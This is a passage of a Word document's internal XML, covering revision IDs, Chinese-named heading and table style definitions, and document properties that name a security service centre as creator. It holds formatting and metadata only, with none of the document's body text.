    <w:rsid w:val="00A05ECB"/>
    <w:rsid w:val="00A175E7"/>
    <w:rsid w:val="00A206C8"/>
    <w:rsid w:val="00A35170"/>
    <w:rsid w:val="00A47B37"/>
    <w:rsid w:val="00A50084"/>
    <w:rsid w:val="00A5338F"/>
    <w:rsid w:val="00A6216A"/>
    <w:rsid w:val="00A644FD"/>
    <w:rsid w:val="00A67EBF"/>
    <w:rsid w:val="00A736D9"/>
    <w:rsid w:val="00A73E51"/>
    <w:rsid w:val="00A7556A"/>
    <w:rsid w:val="00A75E99"/>
    <w:rsid w:val="00A84DE3"/>
    <w:rsid w:val="00A864E4"/>
    <w:rsid w:val="00A86AFB"/>
    <w:rsid w:val="00A874CC"/>
    <w:rsid w:val="00A87BF1"/>
    <w:rsid w:val="00A91737"/>
    <w:rsid w:val="00AA77A9"/>
    <w:rsid w:val="00AB6D0A"/>
    <w:rsid w:val="00AC31F0"/>
    <w:rsid w:val="00AC6A90"/>
    <w:rsid w:val="00AD6BC7"/>
    <w:rsid w:val="00AF3C1D"/>
    <w:rsid w:val="00B02194"/>
    <w:rsid w:val="00B07D7E"/>
    <w:rsid w:val="00B1109A"/>
    <w:rsid w:val="00B169AF"/>
    <w:rsid w:val="00B17D12"/>
    <w:rsid w:val="00B3654B"/>
    <w:rsid w:val="00B52246"/>
    <w:rsid w:val="00B56323"/>
    <w:rsid w:val="00B6212E"/>
    <w:rsid w:val="00B770CF"/>
    <w:rsid w:val="00B8089B"/>
    <w:rsid w:val="00B80CEA"/>
    <w:rsid w:val="00B92B0F"/>
    <w:rsid w:val="00B92F24"/>
    <w:rsid w:val="00B96DA5"/>
    <w:rsid w:val="00BA0EEA"/>
    <w:rsid w:val="00BA692A"/>
    <w:rsid w:val="00BB101A"/>
    <w:rsid w:val="00BB6548"/>
    <w:rsid w:val="00BB65F7"/>
    <w:rsid w:val="00BB6D7E"/>
    <w:rsid w:val="00BC17EC"/>
    <w:rsid w:val="00BC6385"/>
    <w:rsid w:val="00BD146A"/>
    <w:rsid w:val="00BD46B2"/>
    <w:rsid w:val="00BF3932"/>
    <w:rsid w:val="00BF709B"/>
    <w:rsid w:val="00C05AFD"/>
    <w:rsid w:val="00C3577F"/>
    <w:rsid w:val="00C41119"/>
    <w:rsid w:val="00C47888"/>
    <w:rsid w:val="00C577C9"/>
    <w:rsid w:val="00C61731"/>
    <w:rsid w:val="00C65F2A"/>
    <w:rsid w:val="00C757F2"/>
    <w:rsid w:val="00C761E8"/>
    <w:rsid w:val="00C80DB5"/>
    <w:rsid w:val="00C833D1"/>
    <w:rsid w:val="00C862D5"/>
    <w:rsid w:val="00CA3B1D"/>
    <w:rsid w:val="00CA46E3"/>
    <w:rsid w:val="00CA7892"/>
    <w:rsid w:val="00CB3234"/>
    <w:rsid w:val="00CC00C9"/>
    <w:rsid w:val="00CC16B0"/>
    <w:rsid w:val="00CC56C0"/>
    <w:rsid w:val="00CD18EF"/>
    <w:rsid w:val="00CD2F74"/>
    <w:rsid w:val="00CE658F"/>
    <w:rsid w:val="00D10D94"/>
    <w:rsid w:val="00D248F2"/>
    <w:rsid w:val="00D24A3B"/>
    <w:rsid w:val="00D2504F"/>
    <w:rsid w:val="00D30190"/>
    <w:rsid w:val="00D30436"/>
    <w:rsid w:val="00D30B90"/>
    <w:rsid w:val="00D6495D"/>
    <w:rsid w:val="00D652F9"/>
    <w:rsid w:val="00D70FD5"/>
    <w:rsid w:val="00D76CC9"/>
    <w:rsid w:val="00D83491"/>
    <w:rsid w:val="00DA10C4"/>
    <w:rsid w:val="00DA1FA5"/>
    <w:rsid w:val="00DC1BEA"/>
    <w:rsid w:val="00DC2B0E"/>
    <w:rsid w:val="00DD0BCA"/>
    <w:rsid w:val="00DD0DF1"/>
    <w:rsid w:val="00DD20A7"/>
    <w:rsid w:val="00DD6EE1"/>
    <w:rsid w:val="00DD7F66"/>
    <w:rsid w:val="00DF04EB"/>
    <w:rsid w:val="00DF44B3"/>
    <w:rsid w:val="00DF45E4"/>
    <w:rsid w:val="00DF51A6"/>
    <w:rsid w:val="00DF7EC7"/>
    <w:rsid w:val="00E033A4"/>
    <w:rsid w:val="00E03CC1"/>
    <w:rsid w:val="00E16003"/>
    <w:rsid w:val="00E31AFD"/>
    <w:rsid w:val="00E36476"/>
    <w:rsid w:val="00E41E20"/>
    <w:rsid w:val="00E43C85"/>
    <w:rsid w:val="00E547A8"/>
    <w:rsid w:val="00E6047E"/>
    <w:rsid w:val="00E72D82"/>
    <w:rsid w:val="00E740FE"/>
    <w:rsid w:val="00E76708"/>
    <w:rsid w:val="00E805EF"/>
    <w:rsid w:val="00E83359"/>
    <w:rsid w:val="00E94B6E"/>
    <w:rsid w:val="00EA3775"/>
    <w:rsid w:val="00EA6B84"/>
    <w:rsid w:val="00EC4342"/>
    <w:rsid w:val="00EC5D7F"/>
    <w:rsid w:val="00EC61AD"/>
    <w:rsid w:val="00ED3F16"/>
    <w:rsid w:val="00ED43B6"/>
    <w:rsid w:val="00ED4D8A"/>
    <w:rsid w:val="00EE76A9"/>
    <w:rsid w:val="00EE7B39"/>
    <w:rsid w:val="00EE7BCE"/>
    <w:rsid w:val="00F0556C"/>
    <w:rsid w:val="00F10F2E"/>
    <w:rsid w:val="00F17AA6"/>
    <w:rsid w:val="00F2303E"/>
    <w:rsid w:val="00F25090"/>
    <w:rsid w:val="00F26415"/>
    <w:rsid w:val="00F33740"/>
    <w:rsid w:val="00F40047"/>
    <w:rsid w:val="00F5272D"/>
    <w:rsid w:val="00F55DBD"/>
    <w:rsid w:val="00F61583"/>
    <w:rsid w:val="00F632BC"/>
    <w:rsid w:val="00F743F1"/>
    <w:rsid w:val="00F836C6"/>
    <w:rsid w:val="00F87761"/>
    <w:rsid w:val="00F91E0B"/>
    <w:rsid w:val="00FA1DD6"/>
    <w:rsid w:val="00FA74AA"/>
    <w:rsid w:val="00FA78E8"/>
    <w:rsid w:val="00FB2042"/>
    <w:rsid w:val="00FB4BB1"/>
    <w:rsid w:val="00FC1696"/>
    <w:rsid w:val="00FC7499"/>
    <w:rsid w:val="00FC76E8"/>
    <w:rsid w:val="00FD170E"/>
    <w:rsid w:val="00FD2F1A"/>
    <w:rsid w:val="00FD4932"/>
    <w:rsid w:val="00FF1F4D"/>
    <w:rsid w:val="00FF673D"/>
    <w:rsid w:val="01182082"/>
    <w:rsid w:val="01D90B26"/>
    <w:rsid w:val="01E41926"/>
    <w:rsid w:val="027A5940"/>
    <w:rsid w:val="03652B20"/>
    <w:rsid w:val="03F90AE6"/>
    <w:rsid w:val="046057CC"/>
    <w:rsid w:val="04BC3FEE"/>
    <w:rsid w:val="0512093A"/>
    <w:rsid w:val="059F029C"/>
    <w:rsid w:val="060A70A7"/>
    <w:rsid w:val="07294629"/>
    <w:rsid w:val="08367B67"/>
    <w:rsid w:val="085F64AC"/>
    <w:rsid w:val="08D8290B"/>
    <w:rsid w:val="09A129E2"/>
    <w:rsid w:val="0AE459F3"/>
    <w:rsid w:val="0B260413"/>
    <w:rsid w:val="0B696551"/>
    <w:rsid w:val="0BF06883"/>
    <w:rsid w:val="0C4072B2"/>
    <w:rsid w:val="0E130163"/>
    <w:rsid w:val="0E2751E1"/>
    <w:rsid w:val="0E8E40B2"/>
    <w:rsid w:val="0F186B39"/>
    <w:rsid w:val="0FDC3796"/>
    <w:rsid w:val="10445171"/>
    <w:rsid w:val="10521CAA"/>
    <w:rsid w:val="10611AB9"/>
    <w:rsid w:val="10F36003"/>
    <w:rsid w:val="110C35F7"/>
    <w:rsid w:val="11291340"/>
    <w:rsid w:val="121D0DB5"/>
    <w:rsid w:val="127E6D86"/>
    <w:rsid w:val="12993BC0"/>
    <w:rsid w:val="131947E1"/>
    <w:rsid w:val="13A302CE"/>
    <w:rsid w:val="13E9022F"/>
    <w:rsid w:val="145B7611"/>
    <w:rsid w:val="148E3042"/>
    <w:rsid w:val="14972C64"/>
    <w:rsid w:val="14B8712C"/>
    <w:rsid w:val="16702E8A"/>
    <w:rsid w:val="16D90A2F"/>
    <w:rsid w:val="18390949"/>
    <w:rsid w:val="19063178"/>
    <w:rsid w:val="19C201A3"/>
    <w:rsid w:val="1A1E1CEC"/>
    <w:rsid w:val="1A952EBF"/>
    <w:rsid w:val="1AFE48C4"/>
    <w:rsid w:val="1B731705"/>
    <w:rsid w:val="1C954CD6"/>
    <w:rsid w:val="1C97248C"/>
    <w:rsid w:val="1CEB45D2"/>
    <w:rsid w:val="1D0B55C8"/>
    <w:rsid w:val="1D2A06BD"/>
    <w:rsid w:val="1D7C6F7B"/>
    <w:rsid w:val="1DFD5237"/>
    <w:rsid w:val="1DFD647E"/>
    <w:rsid w:val="1F6B347B"/>
    <w:rsid w:val="20083625"/>
    <w:rsid w:val="202F16C0"/>
    <w:rsid w:val="20920044"/>
    <w:rsid w:val="210A1607"/>
    <w:rsid w:val="211508B6"/>
    <w:rsid w:val="21D02A2F"/>
    <w:rsid w:val="23396222"/>
    <w:rsid w:val="24A84AD4"/>
    <w:rsid w:val="24E33EA6"/>
    <w:rsid w:val="24FF7B82"/>
    <w:rsid w:val="25AE6518"/>
    <w:rsid w:val="25B177FF"/>
    <w:rsid w:val="27082C6B"/>
    <w:rsid w:val="270B73F9"/>
    <w:rsid w:val="2927562A"/>
    <w:rsid w:val="2A351E32"/>
    <w:rsid w:val="2B1F1409"/>
    <w:rsid w:val="2B916B5A"/>
    <w:rsid w:val="2CCE2260"/>
    <w:rsid w:val="2D411C4E"/>
    <w:rsid w:val="2D4879CD"/>
    <w:rsid w:val="2E615CCD"/>
    <w:rsid w:val="2EC36B83"/>
    <w:rsid w:val="2EC60F7C"/>
    <w:rsid w:val="2F6D7B0F"/>
    <w:rsid w:val="2FCC083B"/>
    <w:rsid w:val="309E05B5"/>
    <w:rsid w:val="310B3EA9"/>
    <w:rsid w:val="31385CA0"/>
    <w:rsid w:val="32635721"/>
    <w:rsid w:val="32701DFC"/>
    <w:rsid w:val="32F97238"/>
    <w:rsid w:val="330F7979"/>
    <w:rsid w:val="34B30267"/>
    <w:rsid w:val="34E645EB"/>
    <w:rsid w:val="34F34F5A"/>
    <w:rsid w:val="358C65E7"/>
    <w:rsid w:val="36781311"/>
    <w:rsid w:val="36A71B58"/>
    <w:rsid w:val="37704640"/>
    <w:rsid w:val="37A13EFE"/>
    <w:rsid w:val="37EC6507"/>
    <w:rsid w:val="37FE7E9E"/>
    <w:rsid w:val="38012C35"/>
    <w:rsid w:val="385D7E45"/>
    <w:rsid w:val="386713C7"/>
    <w:rsid w:val="38685317"/>
    <w:rsid w:val="38C056B1"/>
    <w:rsid w:val="39012051"/>
    <w:rsid w:val="397D3FDF"/>
    <w:rsid w:val="39894E7E"/>
    <w:rsid w:val="39E70C2A"/>
    <w:rsid w:val="3A173238"/>
    <w:rsid w:val="3B263535"/>
    <w:rsid w:val="3B3659B5"/>
    <w:rsid w:val="3BD00198"/>
    <w:rsid w:val="3C1F5123"/>
    <w:rsid w:val="3C406CD7"/>
    <w:rsid w:val="3C6978B0"/>
    <w:rsid w:val="3CED6733"/>
    <w:rsid w:val="3CFA3924"/>
    <w:rsid w:val="3DB80AEF"/>
    <w:rsid w:val="3E03620E"/>
    <w:rsid w:val="3EEE75D4"/>
    <w:rsid w:val="3F1F5199"/>
    <w:rsid w:val="3F670343"/>
    <w:rsid w:val="40A9327B"/>
    <w:rsid w:val="415A292E"/>
    <w:rsid w:val="416A2C43"/>
    <w:rsid w:val="417E62D1"/>
    <w:rsid w:val="427C747D"/>
    <w:rsid w:val="434F15AD"/>
    <w:rsid w:val="43BD1B67"/>
    <w:rsid w:val="43D146B8"/>
    <w:rsid w:val="44B042CE"/>
    <w:rsid w:val="4502438F"/>
    <w:rsid w:val="45F73E72"/>
    <w:rsid w:val="46815F57"/>
    <w:rsid w:val="476E3264"/>
    <w:rsid w:val="478557D4"/>
    <w:rsid w:val="48D142BF"/>
    <w:rsid w:val="48DD6950"/>
    <w:rsid w:val="49153299"/>
    <w:rsid w:val="4AC77877"/>
    <w:rsid w:val="4AE34AA6"/>
    <w:rsid w:val="4D1542DD"/>
    <w:rsid w:val="4DBB7A1A"/>
    <w:rsid w:val="4ECC61A8"/>
    <w:rsid w:val="4F7C6ADF"/>
    <w:rsid w:val="4FC30FBB"/>
    <w:rsid w:val="4FC3672A"/>
    <w:rsid w:val="4FD31B9F"/>
    <w:rsid w:val="4FE81846"/>
    <w:rsid w:val="50095F5C"/>
    <w:rsid w:val="504B1C98"/>
    <w:rsid w:val="50E21CB3"/>
    <w:rsid w:val="50F86586"/>
    <w:rsid w:val="520B5935"/>
    <w:rsid w:val="521B67F5"/>
    <w:rsid w:val="52397523"/>
    <w:rsid w:val="5257047F"/>
    <w:rsid w:val="52F65EE9"/>
    <w:rsid w:val="53A94D0A"/>
    <w:rsid w:val="53EC4BF7"/>
    <w:rsid w:val="548968E9"/>
    <w:rsid w:val="54AE2EBB"/>
    <w:rsid w:val="553F7706"/>
    <w:rsid w:val="560F6013"/>
    <w:rsid w:val="57BE74C0"/>
    <w:rsid w:val="591675D9"/>
    <w:rsid w:val="5938022D"/>
    <w:rsid w:val="5980650D"/>
    <w:rsid w:val="5AE709EC"/>
    <w:rsid w:val="5B58092E"/>
    <w:rsid w:val="5B6634E0"/>
    <w:rsid w:val="5B8D2D21"/>
    <w:rsid w:val="5C0C052C"/>
    <w:rsid w:val="5C9A3C2C"/>
    <w:rsid w:val="5D1C654D"/>
    <w:rsid w:val="5E6A778C"/>
    <w:rsid w:val="5ED21322"/>
    <w:rsid w:val="5FE33B7B"/>
    <w:rsid w:val="60D640D1"/>
    <w:rsid w:val="611958C3"/>
    <w:rsid w:val="61C01D80"/>
    <w:rsid w:val="62810D49"/>
    <w:rsid w:val="62FB30A8"/>
    <w:rsid w:val="64061D04"/>
    <w:rsid w:val="6420374D"/>
    <w:rsid w:val="645512FD"/>
    <w:rsid w:val="647933CC"/>
    <w:rsid w:val="649B4C85"/>
    <w:rsid w:val="64EA7169"/>
    <w:rsid w:val="65B975D9"/>
    <w:rsid w:val="66723681"/>
    <w:rsid w:val="66A658E8"/>
    <w:rsid w:val="66DA4C09"/>
    <w:rsid w:val="67EB25A8"/>
    <w:rsid w:val="68BC5EB7"/>
    <w:rsid w:val="69D33990"/>
    <w:rsid w:val="6A414B67"/>
    <w:rsid w:val="6A5B0D94"/>
    <w:rsid w:val="6B197F7B"/>
    <w:rsid w:val="6B1C2AE1"/>
    <w:rsid w:val="6BF665EC"/>
    <w:rsid w:val="6C2614F4"/>
    <w:rsid w:val="6C3134F5"/>
    <w:rsid w:val="6D54554A"/>
    <w:rsid w:val="6D9739CD"/>
    <w:rsid w:val="6DC9627D"/>
    <w:rsid w:val="6E067981"/>
    <w:rsid w:val="6E8C4A08"/>
    <w:rsid w:val="703D085C"/>
    <w:rsid w:val="708E73B5"/>
    <w:rsid w:val="718766B5"/>
    <w:rsid w:val="731A4439"/>
    <w:rsid w:val="738C04BF"/>
    <w:rsid w:val="74006D99"/>
    <w:rsid w:val="741E51F9"/>
    <w:rsid w:val="7423609F"/>
    <w:rsid w:val="74493C73"/>
    <w:rsid w:val="75973D58"/>
    <w:rsid w:val="75C33EB4"/>
    <w:rsid w:val="75C86E1A"/>
    <w:rsid w:val="75FA2D4B"/>
    <w:rsid w:val="769377E8"/>
    <w:rsid w:val="76A553AD"/>
    <w:rsid w:val="77132317"/>
    <w:rsid w:val="77F75583"/>
    <w:rsid w:val="78080136"/>
    <w:rsid w:val="783B5319"/>
    <w:rsid w:val="78FF3476"/>
    <w:rsid w:val="79565B55"/>
    <w:rsid w:val="798A0C7E"/>
    <w:rsid w:val="79907C4E"/>
    <w:rsid w:val="7A13262E"/>
    <w:rsid w:val="7A195E96"/>
    <w:rsid w:val="7A1C7BE9"/>
    <w:rsid w:val="7A7430CC"/>
    <w:rsid w:val="7AEA3436"/>
    <w:rsid w:val="7B640A94"/>
    <w:rsid w:val="7B6A44CF"/>
    <w:rsid w:val="7B71246B"/>
    <w:rsid w:val="7C914FE4"/>
    <w:rsid w:val="7DF022CF"/>
    <w:rsid w:val="7E8A7362"/>
    <w:rsid w:val="7ECC2A41"/>
    <w:rsid w:val="7F172A6E"/>
    <w:rsid w:val="7F2C0419"/>
    <w:rsid w:val="7F99624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7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0"/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:link w:val="28"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:before="260" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:bCs w:val="0"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="4"/>
    <w:next w:val="1"/>
    <w:link w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
      </w:numPr>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="5"/>
    <w:next w:val="1"/>
    <w:link w:val="34"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
      </w:numPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:bCs w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="6"/>
    <w:next w:val="1"/>
    <w:link w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
      </w:numPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:bCs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link w:val="40"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="21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Balloon Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="36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4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  <w:bCs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1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3">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="24">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="25">
    <w:name w:val="No Spacing"/>
    <w:link w:val="32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26">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="18"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="27">
    <w:name w:val="标题 1 字符"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="28">
    <w:name w:val="标题 2 字符"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体" w:cs="Times New Roman" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="标题 3 字符"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体" w:cs="Times New Roman" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="30">
    <w:name w:val="网格表 1 浅色 - 着色 11"/>
    <w:basedOn w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="46"/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">
    <w:name w:val="网格表 3 - 着色 11"/>
    <w:basedOn w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="48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  <w:tblStylePr w:type="neCell">
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="9CC2E5" w:themeColor="accent1" w:themeTint="99" w:sz="4" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="9CC2E5" w:themeColor="accent1" w:themeTint="99" w:sz="4" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="seCell">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="9CC2E5" w:themeColor="accent1" w:themeTint="99" w:sz="4" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="9CC2E5" w:themeColor="accent1" w:themeTint="99" w:sz="4" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="32">
    <w:name w:val="无间隔 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="25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34">
    <w:name w:val="标题 4 字符"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="35">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:eastAsia="微软雅黑"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="37">
    <w:name w:val="文章标题"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:beforeLines="50"/>
      <w:ind w:firstLine="480"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="52"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="正文加粗"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="39">
    <w:name w:val="标题 5 字符"/>
    <w:link w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="正文缩进 字符"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="未处理的提及1"/>
    <w:basedOn w:val="1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venus</Company>
  <Pages>11</Pages>
  <Words>1762</Words>
  <Characters>3232</Characters>
  <Lines>26</Lines>
  <Paragraphs>7</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3463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2016-04-25T05:38:00Z</dcterms:created>
  <dc:creator>OBG安全服务中心</dc:creator>
  <cp:lastModifiedBy>穆意</cp:lastModifiedBy>
  <cp:lastPrinted>2016-12-23T06:41:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-07T13:22:17Z</dcterms:modified>
  <cp:revision>333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0x01010009D5E566022EDC41BC74D79443B3728F</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="_dlc_DocIdItemGuid">
    <vt:lpwstr>5463f844-c7cd-4630-9aae-663cd91a53b2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="FileScore">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="EndDate">
    <vt:lpwstr>18-11-02</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="FileDownloads">
    <vt:lpwstr>16</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="FileComments">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="LinkComment">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.12165</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="ICV">
    <vt:lpwstr>7BFC150BB876411C8AA637BFD4D5E21E</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiZmE4ODU5MGJlNGJhZmFlYTljZDcxMGM4NWI3NTM1MjUiLCJ1c2VySWQiOiI3ODM2MTI5MzQifQ==</vt:lpwstr>
  </property>
</Properties>
</file>